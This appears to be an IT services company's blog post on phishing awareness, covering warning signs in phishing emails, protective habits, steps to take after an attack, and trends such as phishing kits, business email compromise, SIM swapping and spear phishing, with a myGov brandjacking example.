Phishing as we know it has been an established scam since the mid-nineties if you can believe it. That’s nearly a quarter of a century of scamming! The technique itself hasn’t changed a lot since then, though it has grown more sophisticated, of course. But the premise and the basic tactic is the same.
We’ll spare you the full-length history lesson, but there’s something important to take away from this. Phishing attacks have been successfully working for nearly 25 years. If they didn’t work, cyber criminals wouldn’t keep doing them. So, don’t get too cocky and assume your business is above such an attack. Everyone is a target of phishing emails, because unfortunately… they work. Let’s look at the phishing meaning, how a phishing emails presents, and how to avoid succumbing to an attack.
What are Phishing Attacks?
Phishing is a type of cyber attack that targets individuals (often at random). Targeted victims receive a fraudulent email posing as a legitimate institution. The scammer tries to entice individuals to provide sensitive data freely. This could be your password, credit card details, security questions, or any other personally identifiable information. The information can then be used to access important accounts, identity theft, or financial loss.
It sounds like it’s easy to avoid, but phishing frequently uses scare tactics to pressure you into taking the bait. They’ll also offer too-good-to-be-true deals, urgent requests with looming deadlines, misleading hyperlinks, and malicious attachments disguised as something innocuous. Firstly, we’ll run through how to identify a phishing email, so you know what to look for. Then we’ll give you tips on how to avoid falling victim to a phishing scam, plus show you some real examples of phishing.
How do Phishing Links Work?
Phishing links are links created by cyber criminals to pose as a link to a legitimate website. Once clicked, they open an attachment and may install malware, spyware, ransomware, etc, on your device.
What Does A Phishing Email Look Like?
Chances are you’ve received a phishing email from Apple before. If you don’t own any Apple devices, this would be supremely easy to identify and avoid. But, for the rest of us iPhone addicts, these phishing emails can easily be confused for the real thing if you’re not alert. Personally, I receive a lot of phishing emails from Paypal and Apple, but, at a glance, it’s easy to identify them.
Most inboxes will only show the display name of the sender, like John Smith or Australia Post, for example. So, in the case of my phishing email from Apple, the sender appears to be Apple Payment. But, if we click on the header link to view the sender information, we see the email is actually from this totally professional email: firstname.lastname@example.org—yeah, seriously. Doesn’t exactly scream ‘official Apple business’, does it?
Look for any combination of the following signs to identify suspicious phishing emails:
Reg Flag #1: Dodgy Grammar and Spelling
The biggest giveaway in any generic phishing email is going to be poor spelling and grammar. A real email from a legitimate brand is usually well-crafted in terms of spelling, grammar, and formatting. Scan the email carefully, noting any errors in spelling. But, why do phishing emails have typos in the first place? Often, scammers intentionally include errors in the phishing email to target gullible people more susceptible to an attack.
Red Flag #2: Odd Manner of Greeting
Many companies you have previously dealt with will address all emails to you personally. The email should address you by name, or be otherwise familiar. A strange Greetings Valued Customer, or similar, should set off alarm bells. As should the email not addressing you at all (see below).
Red Flag #3: Misleading URL
These emails frequently include a link for you to confirm your account details or reset your password. However, these links are usually misleading. How do you know without clicking it? If you’re viewing the email on your browser, simply hover the mouse over the link and it will show you where it’s really linking to. I bet it’s not where it’s supposed to go!
Red Flag #4: Urgent or Threatening Language
A lot of phishing emails will utilise language that encourages you to act immediately. Either your account has been compromised and you have no money, or this amazing once-in-a-lifetime opportunity that is only valid for the next 15 seconds is on offer so CLICK NOW. Never give in to this tactic.
Red Flag #5: Request for Personal Information
Your bank or any other legitimate institution will never ask you to submit your password or other personally identifying information via email. They will almost always speak with you over the phone and verify your identity in several ways before commencing business. Any email that asks you to input your password is a phishing scam.
8 Habits To Help You Avoid a Phishing Scam
We’ve now looked at a few ways in which you can identify a phishing scam. Hopefully, with these tips, you’ll know what to look for with these phishing emails. Therefore, you’ll be able to avoid falling prey to such a scam. However, there are some habits you should try to enforce with yourself and your team. These habits are more or less common sense, but often we overlook the importance of them.
Habit #1: Look for the Lock
These days, you shouldn’t be trusting any site that doesn’t have verified security. This means the URL will begin with HTTPS (not http). Any sites with https will have a little padlock on the address bar, so you know it’s safe. If you end up on a site that is not secure, make sure you don’t enter any information on the site.
Habit #2: Watch Out For Pop-Ups
It wasn’t so long ago that pop-ups were solely the domain of malware attacks and phishing attempts. You might remember something like this: Wow! You’re the 1,000,000th Visitor! Click Here to Win Free iPad! Nowadays, legitimate websites are utilising their own pop-ups to push subscriptions and account sign-ups, which gets tedious after a while. If you’re looking to sign up or subscribe to a website, be wary of any pop-ups and make sure you’re going through a secure form.
Habit #3: Never Give Out Personal Info
On that note, any forms you submit through a website (whether secure or not), should not contain your personal information. At most, you should be entering an email address or a phone number, but any web form worth its salt won’t be needing your financial information or password.
Habit #4: Always Use Antivirus
Antivirus will help protect you from phishing attacks by blocking access to malicious files. Of course, this is in the instance that you’ve accidentally taken the bait on a phishing attack and now the hacker is trying to access your system.
Habit #5: Think Before You Click
This is basic common sense when it comes to online etiquette. So many phishing attempts try to trick you with wording and misplaced buttons, or they have disguised urls (as we discussed above). Take your time, make sure you’re somewhere secure, and ensure the link goes where you want it to.
Habit #6: Keep Abreast of Phishing Scams
As mentioned previously, phishing emails have been around for just about 25 years. That means they’ve evolved over time and new ones are forever coming into circulation. Check sites like Scamwatch and Stay Smart Online, which provide updates and news.
Habit #7: Check Your Accounts
This one feels harder because it’s 2020 and you probably have about 300 online accounts for various sites that you can’t even remember anymore. Many of these are probably defunct, or you simply don’t use them. But someone else might have been accessing your account and is using it maliciously. Search your email inbox for “new account” or “confirm email” to find sites you’ve registered for in the past.
Habit #8: Keep Your Browser Updated
Patches and updates that are periodically rolled out are usually designed to repair vulnerabilities and security loopholes that have the potential to be—or already have been—exploited. If there’s an update for your browser, INSTALL IT.
10 Steps To Take After A Phishing Attack
Step #1: Disconnect The Device From Internet
The biggest risk after clicking a phishing link is that malware or ransomware could be downloaded to the computer within minutes. Immediately disconnect the computer from the Internet to ensure that the attacker cannot remotely access it, and that no virus attempts to send links to your own email contacts.
Step #2: Scan for Malware
The next step is to scan your system for any malware that could already be self-replicating to spread through the network. Ensure that the scanning software can run offline, and consider running a second scan with another program after the first to catch anything that was missed.
Step #3: Backup Files/Follow IR
You should have an incident response plan for your business, and now is the time to follow it. This should include protocols for backing up files, restoring any damage and how to go about identifying the cause and source of the breach and how to contain it.
Step #4: Change Password
This is a no-brainer. Even if the victim of the attack didn’t give away any passwords directly, there is no way to be sure that the attacker doesn’t now have access to them. Just to be on the safe side, update all related account passwords.
Step #5: Notify ScamWatch
ScamWatch is a service run by the Australian Competition and Consumer Commission (ACCC). It provides information on how to recognise, avoid and report scams. Informing ScamWatch provides them with up-to-date information on the latest scams and assists in protecting the community.
Step #6: Contact Your Financial Institution
If you’re afraid that your financial information may be compromised, then contact your bank. Advise them that there was a phishing attack and you can either opt to freeze any accounts, cancel cards, or request account monitoring to watch for suspicious activity.
Step #7: Advise Team
Whether it was you or another team member who fell victim, you still need to keep everyone in the loop. Send out a notice to the whole team advising them of what has occurred. This ensures that everyone stays on their guard as the phishing attempt could very well target other members of the business.
Step #8: Adjust Email Filters to Block Similar Messages
Review the phishing email in question and take steps to adjust email filters so that the email doesn’t get through to other potential victims. The from, subject, and other fields may change with each email, so search for a phrase or keywords you can utilise in the filter.
Step #9: Review Outbound Traffic & DNS Logs
Search your firewall logs for suspicious IPs or URLs, including the ones from the email. Check if there was any outgoing traffic heading to those addresses. But due to changing IP addresses, you should also review the DNS logs to identify any suspicious activity.
Step #10: Use the Opportunity to Educate
Take this chance to educate your team and remind them of how they can be responsible for cyber security within the business. Don’t shame or berate the victim unnecessarily, as this may leave others reluctant to come forward. Simply use the situation as an example to raise security awareness and remind your staff to think before they click.
The Most Common Evasive Phishing Trends
Evasive methods of phishing are designed to avoid the traditional means of detection. Unfortunately, they’re working! Take a look at the most common evasive phishing trends so that you and your employees can remain vigilant when on the Internet.
HTML Character Encoding
In order for local languages in internet software—like web browsers and email clients—the majority of software will support alternate encoding systems for data. This scam uses all or a portion of the phishing page’s HTML code to be encoded and displayed normally by web browsers. Security crawlers looking through the code won’t be able to read the content.
Inspection blocking is the technique most regularly incorporated into phishing kits. It involves hackers employing blocklists for connections for certain IP addresses and hosts. This prevents security systems, analysts, and security bots from uncovering the nature of the compromising phishing site. When someone on the ‘block list’ attempts to access the web page, they are met with a “404 page not found” message.
URLs in Attachments
Recently, a phishing trend taking off is URLs in attachments. This ultimately means that, instead of compromising links being placed in the body of emails, they are hidden in attachments. This makes detection far more difficult. A common example is a simple PDF being made to look like a OneDrive document, complete with a button that links to a phishing site.
Content injection is also not a new technique, but a tried-and-tested method that lulls the user into a false sense of security by infiltrating a legitimate website. This is done through changing a part of the content that then directs the user away from the website and to the phishing page. This method complicates detection and is increasing in popularity.
Legitimate Cloud Hosting
Legitimate cloud hosting is a tactic that has recently seen a lot of growth. In this scenario, hackers host phishing websites on legitimate cloud services. Such a service could be Microsoft Azure. In doing this, legitimate domains and SSL certificates are presented by hackers. The user is then made to believe that the phishing page is trustworthy. Also, many security vendors whitelist certain domains.
Phishing Trends in 2020
Over a month into 2020, it’s important to get our heads around the phishing threats that appeared in 2019 and how they’re going to affect businesses over the next year. As phishing was widely announced as the largest, most impactful, cyber threat for businesses and individuals in 2019, it’s crucial that you act now to safeguard your business.
As phishing threats increased by 46% globally in the third quarter of 2019 (compared to the previous quarter), it’s participated that this sustained trend will continue into 2020. Phishing scams are becoming more sophisticated, simple to create, and appeal to hackers because of the amount of money they can make from a successful scam. In light of this, let’s look at the top phishing trends you need to protect your business from this year.
A phishing kit comprises all the tools you need to launch a phishing attack, making people who wouldn’t otherwise have the technical skillset to undertake a phishing attack exploitable to do so. Phishing kits aren’t anything new, but, like all technology, they’re changing. Today, they are becoming more and more user-friendly and people can quickly and easily establish and execute campaigns.
In July last year, Cyren had already identified 5,334 unique, brand new phishing kits. Turn-key phishing kits offer novice hackers everything they need to replicate login pages of usually trusted sites. Victims trust these sites, entering their logins, passwords, and other personal details. One thing phishing kits often take advantage of are URL generators that create random, multiple URLs. As there are many of them, even if one URL gets blacklisted there are still other working URLs for the attacker to use. This also allows for short-lived phishing sites, further lessening the chance of detection.
Heard of SaaS (software as a service)? Well, there’s also PaaS (phishing as a service), where attackers can subscribe to phishing services for a set monthly fee. Those who are selling PaaS subscriptions are using legitimate, traditional business practices—promoting their services through professional-looking websites. These websites even have shopping carts, product ratings, and discounts!
As with phishing kits, PaaS allows novices to set up phishing campaigns without much technical knowledge. The service includes both a phishing kit and hosting for phishing forms for very competitive prices. Criminals can choose from numerous landing page and hosting for one month, with templates including Sharepoint, Office 365, LinkedIn, OneDrive, Google, Adobe, Dropbox, and DocuSign—just to name a few.
A report from Cyren outlines that the introduction of PaaS into the cyber-crime landscape has seen the rapid growth of the creation of new phishing campaigns:
“Today’s reality is that we are seeing more evasive phishing campaigns in the hands of more attackers at less effort and lower cost than in the past, as technically sophisticated phishing attack developers have adopted a SaaS business model to let even the most amateur criminal wanna-be spoof targeted web sites with a high degree of authenticity and embedded evasive tactics.”
Business Email Compromise
Another up-and-coming area of phishing (specifically spear-fishing, which we delve into below) is business email compromise (BEC). BEC (previously called man-in-the-email scams) uses micro-targeting, honing in on people working at targeted companies. Tech companies, payment gateways, and financial institutions are the most frequently targeted industries. Firstly, attackers define their targets (commercial, government, or NFP organisations).
They then use social engineering tactics to manipulate victims into transferring large amounts of money into fraudulent accounts—or by giving out sensitive information—by impersonating a business representative through using an email address that appears legitimate (this is called “masquerading”). They trick the victim by using a near-identical username to the trusted person’s name or use a domain near-identical to the trusted person’s company.
Social engineering isn’t a new area of phishing, but it is changing. This change is presented in the form of growth, with larger-scale attacks being anticipated. In the USA, a spike in social engineering scams can be predictably tied to the election cycle (scams that use voice deepfakes and SIM swapping—see below), but they’re also on a trajectory of growth of social engineering in Australia.
Voice Technology and Deepfakes
Leveraging advances in artificial intelligence, deepfake technology creates fake or altered audio content. Synthetic audio sounds authentic to humans, hence why deepfake audio are a popular way to try and seem legitimate to high-risk individuals like CEOs and politicians. As deepfakes are used to target high-profile or high-power people, they shouldn’t pose as much of a threat to small-to-medium businesses. However, it’s still important to stay in the know.
SIM Swapping is a social engineering ploy that evades the 2FA security layer by posing as the victim’s mobile carrier, fooling them into handing over their one-time passcode sent via text. Now that they have the code, the hacker convinces the victim’s carrier to port the victim’s phone number to their SIM. The result? The hacker receives all the text messages and phone calls made to this phone number. If the attacker is successful in doing this, they’re able to access personal accounts, business accounts, bank accounts, etc, as they can intercept one-time passcodes sent for these sites.
Interesting Global Phishing Statistics
A Real Phishing Example:
Despite all the warning signs to look for, the main thing to keep in mind is that phishing attacks are always being refined and attackers know that people are looking for giveaway mistakes in phishing emails. So, they have begun to eliminate these glaring red flags that we discussed—let’s have a look at a real phishing attack that hit many Australians last year.
Targeted victims received an email appearing to be from Medicare, prompting them to log in to myGov and update some information. The email was very convincing as it duplicated the real logos from Medicare and myGov websites as you can see here:
The “Sign in” link took victims to a cloned myGov website that looked identical to the original, the only giveaway being the URL. At a glance, the site looks authentic, and you can even see it has the “lock” which establishes it as a secure site! So they are definitely becoming more sophisticated. But the real myGov URL is my.gov.au—as opposed to mygovau.net (the phishing site).
This type of phishing scam can be called ‘brandjacking’ as well, wherein scammers forge an email template to look identical to a legitimate and trusted company. This leads victims to let their guard down and are more likely to trust the email, as it contains a familiar layout and logo.
The Most Common Attack: Spear Phishing
We’d also like to touch on spear-phishing while we’re on this topic. Spear phishing is a type of phishing attack that is far more targeted. Consider the analogy between phishing and fishing, where you’re casting for one of the thousands of fish. The analogy carries through with spear phishing. It’s targeting one specific target with a specialised attack and tool.
Traditional phishing attempts will send thousands or even millions of emails with no personalisation. The attacker is relying on catching even just a handful of these victims—even 1% of 100,000 attacks is still 1000. That’s 1000 wins.
Spear phishing of course has many features in common with regular phishing attacks. Both appear to come from a trusted source (usually), and both will attempt to lure the victim into giving away personal information.
So, what is Spear Phishing exactly?
The key difference is this: spear phishing attacks are highly personalised and customised towards their target. The attacker will be sure to carefully research everything they can about their intended victim. This means combing all social media profiles (Twitter, Facebook, LinkedIn, Instagram), they’ll research where the victim works, who they interact with and build a full profile on the victim to flesh out all their knowledge on the victim.
With this detailed profile on their victim, they are able to craft a very realistic email that is purely designed to fool this one person. It’s scary to think about!
Due to the effort of personalisation and realism that goes into these spear phishing attacks, they are often more likely to succeed than generic phishing attacks. Which is a concerning thought, as these attacks are usually intended to access highly confidential information or corporate secrets.
Overall, it seems that the best thing you can do is keep informed on phishing news and the evolving scams. If you think you’re up to speed, then take this quiz created by Google and see if you can identify a phishing scam on the fly. There is always room for improvement!
If you’re concerned about a phishing attack within your business, or the security of your data, then contact Stanfield IT about it today.